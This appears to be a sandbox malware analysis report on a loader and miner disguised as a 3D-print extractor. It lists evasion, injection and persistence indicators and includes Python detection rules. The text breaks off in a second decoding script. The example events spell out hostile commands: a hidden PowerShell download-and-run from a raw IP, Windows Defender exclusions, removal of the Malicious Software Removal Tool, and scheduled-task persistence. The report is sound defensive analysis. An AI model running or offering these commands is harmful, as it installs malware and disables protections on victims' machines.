File name: Extract 3D Print Part All.exe

Full analysis: https://app.any.run/tasks/e95be3c1-7c03-4f24-888d-5d9270286035
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: February 14, 2025, 16:17:57
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
loader
miner
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32+ executable (GUI) x86-64, for MS Windows, 8 sections
MD5: 57F715859355BD66E6CE1F02BA7E3429
SHA1: 66240C3E10406D82BA9ED6DB48D90C40475B9170
SHA256: E3FFF8FDB26FFF7F7B7A7E8FE3DA1A48F85D57DA0445A58943941BBB82AFA6C2
SSDEEP: 12288:U519i8Q8roXav8fOskHQQSU18WiXcXgazJ3P6KWLOAN4Oj:U55kVmHQ6gazJfPAN4Oj

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Adds path to the Windows Defender exclusion list

      • cmd.exe (PID: 6272)
      • powershell.exe (PID: 6388)
      • sdfg5fee.exe (PID: 5728)
      • Bara.exe (PID: 7328)
    • Changes powershell execution policy (Bypass)

      • cmd.exe (PID: 6272)
      • powershell.exe (PID: 6388)
    • Run PowerShell with an invisible window

      • powershell.exe (PID: 6388)
      • powershell.exe (PID: 6644)
    • Bypass execution policy to execute commands

      • powershell.exe (PID: 6388)
      • powershell.exe (PID: 6644)
    • Uses Task Scheduler to autorun other applications

      • iujtyjythyt.exe (PID: 5032)
      • Client.exe (PID: 3820)
    • Adds extension to the Windows Defender exclusion list

      • liu5jhg.exe (PID: 5572)
      • kaptsegthwf.exe (PID: 7092)
    • Uninstalls Malicious Software Removal Tool (MRT)

      • cmd.exe (PID: 6876)
      • cmd.exe (PID: 5592)
    • Application was injected by another process

      • winlogon.exe (PID: 684)
      • lsass.exe (PID: 760)
      • svchost.exe (PID: 320)
      • svchost.exe (PID: 1076)
      • dwm.exe (PID: 912)
      • svchost.exe (PID: 1068)
      • svchost.exe (PID: 1260)
      • svchost.exe (PID: 1316)
      • svchost.exe (PID: 1268)
      • svchost.exe (PID: 1276)
      • svchost.exe (PID: 1776)
      • svchost.exe (PID: 2372)
      • svchost.exe (PID: 1972)
      • svchost.exe (PID: 1768)
      • svchost.exe (PID: 1452)
      • svchost.exe (PID: 1500)
      • svchost.exe (PID: 1660)
      • svchost.exe (PID: 1784)
      • svchost.exe (PID: 1908)
      • svchost.exe (PID: 1880)
      • svchost.exe (PID: 2064)
      • svchost.exe (PID: 1980)
      • svchost.exe (PID: 2364)
      • svchost.exe (PID: 2192)
      • svchost.exe (PID: 2272)
      • svchost.exe (PID: 1364)
      • svchost.exe (PID: 1424)
      • svchost.exe (PID: 1564)
      • svchost.exe (PID: 2852)
      • svchost.exe (PID: 2748)
      • svchost.exe (PID: 2500)
      • svchost.exe (PID: 2892)
      • svchost.exe (PID: 2816)
      • svchost.exe (PID: 3016)
      • svchost.exe (PID: 2920)
      • svchost.exe (PID: 2288)
      • svchost.exe (PID: 3704)
      • svchost.exe (PID: 2944)
      • svchost.exe (PID: 2360)
      • svchost.exe (PID: 2256)
      • svchost.exe (PID: 2660)
      • svchost.exe (PID: 3592)
      • svchost.exe (PID: 2340)
      • spoolsv.exe (PID: 2652)
      • OfficeClickToRun.exe (PID: 2884)
      • svchost.exe (PID: 3668)
      • svchost.exe (PID: 4168)
      • dasHost.exe (PID: 3896)
      • sihost.exe (PID: 1712)
      • svchost.exe (PID: 3160)
      • explorer.exe (PID: 4488)
      • svchost.exe (PID: 4436)
      • svchost.exe (PID: 4696)
      • ctfmon.exe (PID: 4268)
      • svchost.exe (PID: 4176)
      • RuntimeBroker.exe (PID: 4676)
      • dllhost.exe (PID: 5164)
      • RuntimeBroker.exe (PID: 4960)
      • svchost.exe (PID: 3600)
      • svchost.exe (PID: 3824)
      • svchost.exe (PID: 3164)
      • svchost.exe (PID: 4000)
      • svchost.exe (PID: 2952)
      • UserOOBEBroker.exe (PID: 3004)
      • ApplicationFrameHost.exe (PID: 6108)
      • svchost.exe (PID: 812)
      • svchost.exe (PID: 3976)
      • svchost.exe (PID: 4456)
      • MoUsoCoreWorker.exe (PID: 4712)
      • svchost.exe (PID: 1764)
      • svchost.exe (PID: 4200)
      • svchost.exe (PID: 1340)
      • uhssvc.exe (PID: 2908)
      • svchost.exe (PID: 3056)
      • svchost.exe (PID: 376)
      • svchost.exe (PID: 1176)
      • svchost.exe (PID: 1888)
      • dllhost.exe (PID: 5904)
      • RuntimeBroker.exe (PID: 5820)
      • RuntimeBroker.exe (PID: 6944)
      • svchost.exe (PID: 5968)
      • svchost.exe (PID: 1540)
      • dllhost.exe (PID: 1816)
      • svchost.exe (PID: 4980)
      • WmiPrvSE.exe (PID: 4308)
      • WmiPrvSE.exe (PID: 6352)
      • dllhost.exe (PID: 7384)
      • dllhost.exe (PID: 7904)
    • Runs injected code in another process

      • dialer.exe (PID: 6408)
      • dialer.exe (PID: 6444)
      • powershell.exe (PID: 6744)
      • powershell.exe (PID: 6832)
    • MINER has been detected (SURICATA)

      • dialer.exe (PID: 7208)
    • Dynamically loads an assembly (POWERSHELL)

      • powershell.exe (PID: 6744)
      • powershell.exe (PID: 6832)
  • SUSPICIOUS

    • Starts NET.EXE to display or manage information about active sessions

      • cmd.exe (PID: 6272)
      • net.exe (PID: 6340)
    • Executing commands from a ".bat" file

      • Extract 3D Print Part All.exe (PID: 6172)
      • cmd.exe (PID: 6272)
    • Starts CMD.EXE for commands execution

      • Extract 3D Print Part All.exe (PID: 6172)
      • cmd.exe (PID: 6272)
      • liu5jhg.exe (PID: 5572)
      • sdfg5fee.exe (PID: 5728)
      • kaptsegthwf.exe (PID: 7092)
    • Script adds exclusion path to Windows Defender

      • cmd.exe (PID: 6272)
      • powershell.exe (PID: 6388)
      • sdfg5fee.exe (PID: 5728)
      • liu5jhg.exe (PID: 5572)
      • kaptsegthwf.exe (PID: 7092)
      • Bara.exe (PID: 7328)
    • PowerShell delay command usage (probably sleep evasion)

      • powershell.exe (PID: 6388)
      • powershell.exe (PID: 6644)
    • Likely accesses (executes) a file from the Public directory

      • powershell.exe (PID: 6388)
      • powershell.exe (PID: 6644)
      • Okfgjrg5d8gt.exe (PID: 2676)
      • liu5jhg.exe (PID: 5572)
      • schtasks.exe (PID: 3840)
      • sdfg5fee.exe (PID: 5728)
      • iujtyjythyt.exe (PID: 5032)
    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 6272)
      • powershell.exe (PID: 6388)
      • liu5jhg.exe (PID: 5572)
      • sdfg5fee.exe (PID: 5728)
      • kaptsegthwf.exe (PID: 7092)
      • svchost.exe (PID: 1276)
      • Bara.exe (PID: 7328)
    • Starts process via Powershell

      • powershell.exe (PID: 6388)
    • Manipulates environment variables

      • powershell.exe (PID: 6388)
      • powershell.exe (PID: 6644)
      • powershell.exe (PID: 6424)
      • powershell.exe (PID: 6476)
      • powershell.exe (PID: 6784)
      • powershell.exe (PID: 7952)
    • Reads security settings of Internet Explorer

      • Extract 3D Print Part All.exe (PID: 6172)
      • Okfgjrg5d8gt.exe (PID: 2676)
    • Reads the date of Windows installation

      • Extract 3D Print Part All.exe (PID: 6172)
      • Okfgjrg5d8gt.exe (PID: 2676)
    • Found IP address in command line

      • powershell.exe (PID: 6388)
      • powershell.exe (PID: 6644)
    • Application launched itself

      • powershell.exe (PID: 6388)
      • cmd.exe (PID: 6272)
    • The process bypasses the loading of PowerShell profile settings

      • powershell.exe (PID: 6388)
    • Connects to the server without a host name

      • powershell.exe (PID: 6644)
    • Potential Corporate Privacy Violation

      • powershell.exe (PID: 6644)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 6644)
      • Okfgjrg5d8gt.exe (PID: 2676)
      • iujtyjythyt.exe (PID: 5032)
      • liu5jhg.exe (PID: 5572)
      • sdfg5fee.exe (PID: 5728)
      • kaptsegthwf.exe (PID: 7092)
    • Uses sleep to delay execution (POWERSHELL)

      • powershell.exe (PID: 6644)
    • Starts itself from another location

      • iujtyjythyt.exe (PID: 5032)
    • The process checks if current user has admin rights

      • sdfg5fee.exe (PID: 5728)
    • Script adds exclusion extension to Windows Defender

      • liu5jhg.exe (PID: 5572)
      • kaptsegthwf.exe (PID: 7092)
    • Connects to unusual port

      • Client.exe (PID: 3820)
      • dialer.exe (PID: 7208)
    • Stops a currently running service

      • sc.exe (PID: 2212)
      • sc.exe (PID: 6676)
      • sc.exe (PID: 3288)
      • sc.exe (PID: 6828)
      • sc.exe (PID: 4076)
      • sc.exe (PID: 6284)
      • sc.exe (PID: 4684)
      • sc.exe (PID: 4740)
      • sc.exe (PID: 4984)
      • sc.exe (PID: 6212)
      • sc.exe (PID: 6304)
      • sc.exe (PID: 6028)
      • sc.exe (PID: 5680)
      • sc.exe (PID: 6476)
      • sc.exe (PID: 640)
      • sc.exe (PID: 2224)
    • Process uninstalls Windows update

      • wusa.exe (PID: 6804)
      • wusa.exe (PID: 6392)
    • Uses powercfg.exe to modify the power settings

      • cmd.exe (PID: 7152)
      • liu5jhg.exe (PID: 5572)
      • kaptsegthwf.exe (PID: 7092)
    • Starts SC.EXE for service management

      • liu5jhg.exe (PID: 5572)
      • cmd.exe (PID: 6960)
      • kaptsegthwf.exe (PID: 7092)
    • Windows service management via SC.EXE

      • sc.exe (PID: 536)
      • sc.exe (PID: 6768)
    • Uses REG/REGEDIT.EXE to modify registry

      • cmd.exe (PID: 6960)
    • Creates a new Windows service

      • sc.exe (PID: 6268)
    • Executes as Windows Service

      • kaptsegthwf.exe (PID: 7092)
    • The process executes via Task Scheduler

      • powershell.exe (PID: 6832)
      • powershell.exe (PID: 6744)
      • Bara.exe (PID: 7328)
    • Checks a user's role membership (POWERSHELL)

      • powershell.exe (PID: 6892)
      • powershell.exe (PID: 6460)
    • Crypto Currency Mining Activity Detected

      • dialer.exe (PID: 7208)
    • Drops a system driver (possible attempt to evade defenses)

      • kaptsegthwf.exe (PID: 7092)
  • INFO

    • Create files in a temporary directory

      • Extract 3D Print Part All.exe (PID: 6172)
    • Process checks computer location settings

      • Extract 3D Print Part All.exe (PID: 6172)
      • Okfgjrg5d8gt.exe (PID: 2676)
    • Checks supported languages

      • Extract 3D Print Part All.exe (PID: 6172)
      • Okfgjrg5d8gt.exe (PID: 2676)
      • liu5jhg.exe (PID: 5572)
      • sdfg5fee.exe (PID: 5728)
      • iujtyjythyt.exe (PID: 5032)
      • Client.exe (PID: 3820)
      • kaptsegthwf.exe (PID: 7092)
    • Reads the computer name

      • Extract 3D Print Part All.exe (PID: 6172)
      • Okfgjrg5d8gt.exe (PID: 2676)
      • iujtyjythyt.exe (PID: 5032)
      • Client.exe (PID: 3820)
    • Reads security settings of Internet Explorer

      • explorer.exe (PID: 4488)
      • RuntimeBroker.exe (PID: 6944)
    • Checks if a key exists in the options dictionary (POWERSHELL)

      • powershell.exe (PID: 6644)
      • powershell.exe (PID: 6476)
      • powershell.exe (PID: 6424)
      • powershell.exe (PID: 6784)
      • powershell.exe (PID: 6892)
    • Disables trace logs

      • powershell.exe (PID: 6644)
    • Checks proxy server information

      • powershell.exe (PID: 6644)
    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 6644)
      • powershell.exe (PID: 6424)
      • powershell.exe (PID: 6476)
      • powershell.exe (PID: 6784)
    • Reads the software policy settings

      • lsass.exe (PID: 760)
    • Reads Environment values

      • iujtyjythyt.exe (PID: 5032)
      • Client.exe (PID: 3820)
    • Reads the machine GUID from the registry

      • iujtyjythyt.exe (PID: 5032)
      • Client.exe (PID: 3820)
    • Creates files or folders in the user directory

      • iujtyjythyt.exe (PID: 5032)
    • Reads the time zone

      • WmiPrvSE.exe (PID: 6352)
    • Creates files in the program directory

      • liu5jhg.exe (PID: 5572)
      • MoUsoCoreWorker.exe (PID: 4712)
      • sdfg5fee.exe (PID: 5728)
      • svchost.exe (PID: 1076)
    • The sample compiled with japanese language support

      • kaptsegthwf.exe (PID: 7092)
Signature artifacts and the mapping to the MITRE ATT&CK™ matrix are in the full report.
No Malware configuration.
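The indicator list above names behaviours but not the command lines that triggered them. As an added example (not ANY.RUN's detection engine or its signatures), the Python below expresses a subset of those indicators as rules over process-creation command lines and rebuilds the parent chain the behavior graph draws. The events are constructed: PIDs and image names follow this report, the two sc.exe command lines are copied verbatim from the process information further down, and every other command line and every parent/child link is an assumption made for illustration.

```python
"""Behaviour rules over process-creation events, modelled on the indicator
names in this report. Added example; not ANY.RUN's detection engine."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


# Indicator name (as printed in the report) -> this example's own approximation
# of it as a pattern over the command line.
RULES = {
    "Adds path to the Windows Defender exclusion list":
        re.compile(r"Add-MpPreference\b.*-ExclusionPath\b", re.I),
    "Adds extension to the Windows Defender exclusion list":
        re.compile(r"Add-MpPreference\b.*-ExclusionExtension\b", re.I),
    "Changes powershell execution policy (Bypass)":
        re.compile(r"-(?:ExecutionPolicy|ep)\s+Bypass\b", re.I),
    "Run PowerShell with an invisible window":
        re.compile(r"-(?:WindowStyle|w)\s+Hidden\b", re.I),
    "Found IP address in command line":
        re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b"),
    "Uses Task Scheduler to autorun other applications":
        re.compile(r"\bschtasks(?:\.exe)?\b.*\s/create\b", re.I),
    # KB890830 is the Malicious Software Removal Tool update package.
    "Uninstalls Malicious Software Removal Tool (MRT)":
        re.compile(r"\bwusa(?:\.exe)?\b.*/uninstall\b.*\bkb:?\s*890830\b", re.I),
    "Stops a currently running service":
        re.compile(r"\bsc(?:\.exe)?\s+stop\s+\S+", re.I),
    "Windows service management via SC.EXE":
        re.compile(r"\bsc(?:\.exe)?\s+(?:delete|config|failure)\s+\S+", re.I),
    "Creates a new Windows service":
        re.compile(r"\bsc(?:\.exe)?\s+create\s+\S+", re.I),
    "Uses powercfg.exe to modify the power settings":
        re.compile(r"\bpowercfg(?:\.exe)?\s+[-/](?:x|change|setacvalueindex|hibernate)\b", re.I),
}


def scan(events):
    """Return (pid, image, indicator) triples in event order."""
    hits = []
    for ev in events:
        for name, pat in RULES.items():
            if pat.search(ev.cmdline):
                hits.append((ev.pid, ev.image, name))
    return hits


def lineage(events, pid):
    """Follow ppid links back to the root: the path the behavior graph draws for a PID."""
    by_pid = {ev.pid: ev for ev in events}
    path, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        path.append(by_pid[pid].image)
        pid = by_pid[pid].ppid
    return path[::-1]


# Constructed events. PIDs and image names follow the report; the two sc.exe
# command lines are verbatim from its process information, every other command
# line and every parent link is an assumption of this example.
SAMPLE_EVENTS = [
    ProcEvent(6172, 1, "Extract 3D Print Part All.exe",
              r'"C:\Users\admin\AppData\Local\Temp\Extract 3D Print Part All.exe"'),
    ProcEvent(6272, 6172, "cmd.exe",
              r'cmd.exe /c "C:\Users\admin\AppData\Local\Temp\auto14.bat"'),
    ProcEvent(6388, 6272, "powershell.exe",
              'powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden '
              '-Command "Add-MpPreference -ExclusionPath C:\\Users\\Public"'),
    ProcEvent(6644, 6388, "powershell.exe",
              'powershell.exe -w hidden -ep bypass -c "iwr http://185.148.3.216/Okfgjrg5d8gt '
              '-OutFile C:\\Users\\Public\\Okfgjrg5d8gt.exe; Start-Sleep 5; '
              '& C:\\Users\\Public\\Okfgjrg5d8gt.exe"'),
    ProcEvent(536, 5572, "sc.exe", r'C:\WINDOWS\system32\sc.exe delete "WAGDKRVZ"'),
    ProcEvent(640, 7092, "sc.exe", r"C:\WINDOWS\system32\sc.exe stop dosvc"),
    ProcEvent(6804, 6876, "wusa.exe", "wusa.exe /uninstall /kb:890830 /quiet /norestart"),
    ProcEvent(3840, 5032, "schtasks.exe",
              'schtasks.exe /create /tn "Client" /tr C:\\Users\\Public\\Client.exe '
              '/sc onlogon /rl highest /f'),
]

if __name__ == "__main__":
    for pid, image, name in scan(SAMPLE_EVENTS):
        print(f"{pid:>5} {image:<32} {name}  <- {' > '.join(lineage(SAMPLE_EVENTS, pid))}")
```

The rules deliberately key on the tool and verb (Add-MpPreference, sc stop, wusa /uninstall with the MRT KB) rather than on file names, because every helper executable in this run carries a throwaway random name while the living-off-the-land commands they issue do not change. Running the example on real telemetry means feeding it Sysmon event 1 or Security 4688 records with command-line auditing enabled; without the command line most of these rules have nothing to match.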

TRiD

.exe | Generic Win/DOS Executable (50)
.exe | DOS Executable Generic (49.9)

EXIF

EXE

MachineType: AMD AMD64
TimeStamp: 2024:02:26 09:01:47+00:00
ImageFileCharacteristics: Executable, Large address aware
PEType: PE32+
LinkerVersion: 14.33
CodeSize: 288768
InitializedDataSize: 163328
UninitializedDataSize: -
EntryPoint: 0x32e60
OSVersion: 5.2
ImageVersion: -
SubsystemVersion: 5.2
Subsystem: Windows GUI
Screenshots: available in the full report.
Total processes: 235
Monitored processes: 199
Malicious processes: 103
Suspicious processes: 4

Behavior graph

Interactive process tree; per-process details are in the full report. Processes in the order the graph lists them ("no specs" in the original marks processes with no indicators of their own): extract 3d print part all.exe, cmd.exe, conhost.exe, net.exe, net1.exe, powershell.exe, powershell.exe, conhost.exe, cmd.exe, runtimebroker.exe, wmiprvse.exe, okfgjrg5d8gt.exe, liu5jhg.exe, sdfg5fee.exe, iujtyjythyt.exe, schtasks.exe, conhost.exe, client.exe, schtasks.exe, conhost.exe, wmiprvse.exe, then a long run of powershell.exe, cmd.exe, conhost.exe, sc.exe, powercfg.exe, wusa.exe, reg.exe and dialer.exe instances, kaptsegthwf.exe followed by a second run of the same helpers (powershell.exe, sc.exe, wusa.exe, powercfg.exe, dialer.exe), dialer.exe tagged #MINER, schtasks.exe, bara.exe, dllhost.exe (two instances), powershell.exe, conhost.exe, and finally the system processes listed above under "Application was injected by another process" (svchost.exe, winlogon.exe, lsass.exe, dwm.exe, sihost.exe, spoolsv.exe, officeclicktorun.exe, uhssvc.exe, useroobebroker.exe, dashost.exe, ctfmon.exe, explorer.exe, runtimebroker.exe, mousocoreworker.exe, dllhost.exe, applicationframehost.exe) together with a second extract 3d print part all.exe entry.

Process information

PID: 204
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: powercfg.exe
User: admin
Company: Microsoft Corporation
Integrity Level: HIGH
Description: Console Window Host
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 204 (the PID was reused after the conhost.exe instance above exited; both processes have an exit code)
CMD: C:\WINDOWS\system32\dialer.exe
Path: C:\Windows\System32\dialer.exe
Parent process: sdfg5fee.exe
User: admin
Company: Microsoft Corporation
Integrity Level: HIGH
Description: Microsoft Windows Phone Dialer
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images; the first entry is a non-Microsoft image from the user's Temp directory mapped into the signed dialer.exe process, consistent with the dialer.exe instances flagged above for running injected code):
c:\users\admin\appdata\local\temp\18d6.tmp
c:\windows\system32\dialer.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
PID: 320
CMD: C:\WINDOWS\system32\svchost.exe -k DcomLaunch -p -s LSM
Path: C:\Windows\System32\svchost.exe
Parent process: services.exe
User: SYSTEM
Company: Microsoft Corporation
Integrity Level: SYSTEM
Description: Host Process for Windows Services
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\lsm.dll
c:\windows\system32\msvcrt.dll
PID: 376
CMD: C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s WdiSystemHost
Path: C:\Windows\System32\svchost.exe
Parent process: services.exe
User: SYSTEM
Company: Microsoft Corporation
Integrity Level: SYSTEM
Description: Host Process for Windows Services
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
PID: 536
CMD: C:\WINDOWS\system32\sc.exe delete "WAGDKRVZ"
Path: C:\Windows\System32\sc.exe
Parent process: liu5jhg.exe
User: admin
Company: Microsoft Corporation
Integrity Level: HIGH
Description: Service Control Manager Configuration Tool
Exit code: 1060 (ERROR_SERVICE_DOES_NOT_EXIST: no service named WAGDKRVZ was installed when the delete ran)
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
c:\windows\system32\sc.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\bcrypt.dll
PID: 624
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: sc.exe
User: admin
Company: Microsoft Corporation
Integrity Level: HIGH
Description: Console Window Host
Exit code: 0
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 640
CMD: C:\WINDOWS\system32\sc.exe stop dosvc
Path: C:\Windows\System32\sc.exe
Parent process: kaptsegthwf.exe (running as SYSTEM, consistent with the "Executes as Windows Service" indicator above)
User: SYSTEM
Company: Microsoft Corporation
Integrity Level: SYSTEM
Description: Service Control Manager Configuration Tool
Exit code: 1062 (ERROR_SERVICE_NOT_ACTIVE: dosvc, the Delivery Optimization service, was not running)
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
c:\windows\system32\sc.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\bcrypt.dll
PID: 684
CMD: winlogon.exe
Path: C:\Windows\System32\winlogon.exe
User: SYSTEM
Company: Microsoft Corporation
Integrity Level: SYSTEM
Description: Windows Logon Application
Version: 10.0.19041.3636 (WinBuild.160101.0800)
Modules (images):
c:\windows\system32\winlogon.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
PID: 760
CMD: C:\WINDOWS\system32\lsass.exe
Path: C:\Windows\System32\lsass.exe
Parent process: wininit.exe
User: SYSTEM
Company: Microsoft Corporation
Integrity Level: SYSTEM
Description: Local Security Authority Process
Version: 10.0.19041.3636 (WinBuild.160101.0800)
Modules (images):
c:\windows\system32\lsass.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\lsasrv.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\sechost.dll
PID: 812
CMD: C:\WINDOWS\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
Path: C:\Windows\System32\svchost.exe
Parent process: services.exe
User: SYSTEM
Company: Microsoft Corporation
Integrity Level: SYSTEM
Description: Host Process for Windows Services
Version: 10.0.19041.1 (WinBuild.160101.0800)
Modules (images):
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
Total events: 62 746
Read events: 62 509
Write events: 168
Delete events: 69

Modification events

PID 1276, svchost.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C2AF3602-9179-4BAE-85B3-74A4EF5CF51F}
Operation: write
Name: DynamicInfo
Value: 03000000BDCB09F80A59DA0186AED304FC7EDB010000000000000000CEF1EF07FC7EDB01

PID 1276, svchost.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{4671B5C1-A383-4428-A45A-8D348E4CB873}
Operation: write
Name: DynamicInfo
Value: 030000009F7DFD23AAB7D8010FF3C204FC7EDB010000000000000000FB2DCF09FC7EDB01

PID 4268, ctfmon.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Input\TypingInsights
Operation: write
Name: Insights
Value: 02000000071DE8C131CC8360A3D6D9C1330A686B165ABA2E235F5A5C

PID 1340, svchost.exe
Key: HKEY_USERS\S-1-5-21-1693682860-607145093-2874071422-1001\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store
Operation: write
Name: C:\Users\admin\AppData\Local\Temp\Extract 3D Print Part All.exe
Value: 534143500100000000000000070000002800000057A25D000000000001000000000000000000000A0021000050BB64EDDDACD5010000000000000000

PID 1340, svchost.exe
Key: \REGISTRY\A\{ba508f59-178e-7fcd-e401-10c27b47ebb6}\Root\InventoryApplicationFile
Operation: write
Name: WritePermissionsCheck
Value: 1

PID 1340, svchost.exe
Key: \REGISTRY\A\{ba508f59-178e-7fcd-e401-10c27b47ebb6}\Root\InventoryApplicationFile\PermissionsCheckTestKey
Operation: delete key
Name: (default)
Value: (none)

PID 1340, svchost.exe
Key: \REGISTRY\A\{ba508f59-178e-7fcd-e401-10c27b47ebb6}\Root\InventoryApplicationFile\extract 3d print|a3de61c6c1be9498
Operation: write
Name: ProgramId
Value: 00065d5bacd373144b822b6dc26a4d06c9770000ffff

PID 1340, svchost.exe
Key: \REGISTRY\A\{ba508f59-178e-7fcd-e401-10c27b47ebb6}\Root\InventoryApplicationFile\extract 3d print|a3de61c6c1be9498
Operation: write
Name: FileId
Value: 000066240c3e10406d82ba9ed6db48d90c40475b9170

PID 1340, svchost.exe
Key: \REGISTRY\A\{ba508f59-178e-7fcd-e401-10c27b47ebb6}\Root\InventoryApplicationFile\extract 3d print|a3de61c6c1be9498
Operation: write
Name: LowerCaseLongPath
Value: c:\users\admin\appdata\local\temp\extract 3d print part all.exe

PID 1340, svchost.exe
Key: \REGISTRY\A\{ba508f59-178e-7fcd-e401-10c27b47ebb6}\Root\InventoryApplicationFile\extract 3d print|a3de61c6c1be9498
Operation: write
Name: LongPathHash
Value: extract 3d print|a3de61c6c1be9498

Reading these: the InventoryApplicationFile and Compatibility Assistant\Store entries are the operating system's application-compatibility inventory recording that the sample ran, not changes the sample made (the FileId value is the sample's SHA1, 66240C3E…, prefixed with 0000, which makes it a usable pivot in Amcache during forensics). The two TaskCache DynamicInfo writes come from the same svchost.exe (PID 1276) that the indicators above show starting powershell.exe, the behaviour expected of the Task Scheduler service host when a task fires.
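The two DynamicInfo values above are opaque 36-byte blobs as printed. As an added example (not something the report or ANY.RUN provides), the Python below decodes them using the version-3 layout described in public Windows forensics write-ups: uint32 version, FILETIME registration time, FILETIME last start, uint32 state, uint32 last error, FILETIME last successful completion. That layout, and treating the report's analysis date as UTC, are assumptions of this example; the blob values themselves are copied from the events above.

```python
"""Decode Task Scheduler TaskCache DynamicInfo blobs. Added example; the
field layout is taken from public forensic write-ups, not from this report."""
import struct
from datetime import datetime, timedelta, timezone

FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)
# The report's analysis date, assumed here to be UTC.
ANALYSIS_START = datetime(2025, 2, 14, 16, 17, 57, tzinfo=timezone.utc)

# Values copied from the modification events above, keyed by task GUID.
TASKCACHE_WRITES = {
    "{C2AF3602-9179-4BAE-85B3-74A4EF5CF51F}":
        "03000000BDCB09F80A59DA0186AED304FC7EDB010000000000000000CEF1EF07FC7EDB01",
    "{4671B5C1-A383-4428-A45A-8D348E4CB873}":
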